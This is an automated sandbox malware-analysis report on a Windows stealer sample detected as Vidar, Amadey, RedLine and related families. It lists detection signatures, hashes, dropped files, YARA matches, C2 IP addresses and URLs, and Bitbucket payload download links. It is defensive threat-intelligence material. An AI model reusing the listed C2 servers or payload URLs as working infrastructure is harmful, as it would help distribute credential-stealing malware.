Windows Analysis Report
DQxttu2Qrr.exe

Overview

General Information

Sample Name:	DQxttu2Qrr.exe
Analysis ID:	764033
MD5:	7434b42e11380272961c92e061072e78
SHA1:	a2dea715e33a860dc09d09b219db18831e6bb1a5
SHA256:	9922432bfa7768bdfb6e8b079c90744c9f3d33a5a258a97abc8519f81a680e40
Tags:	32ArkeiStealerexetrojan
Infos:

Detection

Amadey, Laplas Clipper, RedLine, SystemBC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Yara detected Laplas Clipper

System process connects to network (likely due to code injection or exploit)

Yara detected SystemBC

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Creates multiple autostart registry keys

Query firmware table information (likely to detect VMs)

Uses cmd line tools excessively to alter registry or file data

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect debuggers (CloseHandle check)

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Tries to evade analysis by execution special instruction (VM detection)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Uses powercfg.exe to modify the power settings

Hides threads from debuggers

Modifies power options to not sleep / hibernate

Overwrites code with function prologues

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Self deletion via cmd or bat file

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

Modifies the hosts file

Yara detected Generic Downloader

Found hidden mapped module (file has been removed from disk)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to steal Instant Messenger accounts or passwords

Drops PE files to the application program directory (C:\ProgramData)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Checks if the current process is being debugged

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

PE file contains an invalid checksum

Uses cacls to modify the permissions of files

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

PE / OLE file has an invalid certificate

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://65.21.119.56:80	Avira URL Cloud: Label: malware
Source: http://65.21.119.56:80/update.zip	Avira URL Cloud: Label: malware
Source: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963	Avira URL Cloud: Label: malware
Source: http://167.235.150.8:80	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jekppnay.tmp

Avira: detection malicious, Label: HEUR/AGEN.1236196

Multi AV Scanner detection for submitted file

Source: DQxttu2Qrr.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\61312899942613011832.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\1000019012\syncfiles.dll	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\advapi32.dll	ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\jekppnay.tmp	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	ReversingLabs: Detection: 17%
Source: C:\Users\user\Locktime\RtkAudUService64.exe	ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\Locktime\RtkAudUService64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\advapi32.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	Joe Sandbox ML: detected

Source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["http://65.21.119.56:80", "https://t.me/vmt001"], "Botnet": "1760", "Version": "56.1"}
Source: 4.2.61312899942613011832.exe.1150000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "85.209.135.109/jg94cVd30f/index.php", "Version": "3.50"}

Uses 32bit PE files

Source: DQxttu2Qrr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DQxttu2Qrr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Carafej mamib cemike\xiwati\Dedexaj wahiraje\jeweyohe kajexef.pdb source: umciavi64.exe, 00000031.00000002.647446249.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp, umciavi64.exe, 00000031.00000000.425031565.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.3 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 89.22.236.225 4193
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 85.209.135.109 80	Jump to behavior

Yara detected Generic Downloader

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 85.209.135.109/jg94cVd30f/index.php
Source: Malware configuration extractor	URLs: http://65.21.119.56:80
Source: Malware configuration extractor	URLs: https://t.me/vmt001

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View	ASN Name: INETLTDTR INETLTDTR

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 89.22.236.225 89.22.236.225
Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1

Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.235.150.8:80
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://65.21.119.56:80
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://65.21.119.56:80/update.zip
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://65.21.119.56:80https://t.me/vmt001hello0;open_open
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cjDliFVN3QKbi0ymi0MA.WclWOx4jCqZsNQbjvsAivMLJa9uT5DhrasATByTHQ5iENK14UsJkLrDsnRarngdZ7r0MiULb
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/)a
Source: powershell.exe, 00000020.00000002.716445080.000001A0AC6A4000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ripple-wells-2022.net/
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000020.00000002.656197895.000001A094341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331524675.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: avicapn32.exe, 0000001B.00000002.857905860.00000000017DE000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/E
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/H
Source: umciavi64.exe, 00000031.00000003.561824002.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/down.
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b803c041-f8b5-
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b97f81fe-0ba4-
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/cba79466-746d-
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/l
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/D
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597
Source: umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.631988058.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.642766425.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.bin
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.binIua2gnOxsYQNjWglYDZ3357MMJTmqF
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin6
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin8
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binR
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binin
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binl
Source: umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin0c9c7142b75e/library.bin
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin8
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bind
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.binn
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bint
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/versal
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ww
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000020.00000003.420288387.000001A095FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000020.00000002.719705380.000001A0AC974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199441933804
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome?p=update_error
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/installer/?product=
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/dishasta
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/dishastahttps://steamcommunity.com/profiles/76561199441933804http://167.235.150.8:80dis
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://t.me/vmt001
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: DQxttu2Qrr.exe, 00000000.00000002.328859576.0000000027DCD000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: DQxttu2Qrr.exe, 00000000.00000003.264721352.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c

Creates a DirectInput object (often for capturing keystrokes)

Source: 61312899942613011832.exe, 00000004.00000002.326390178.000000000084A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Malicious sample detected (through community Yara rule)

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
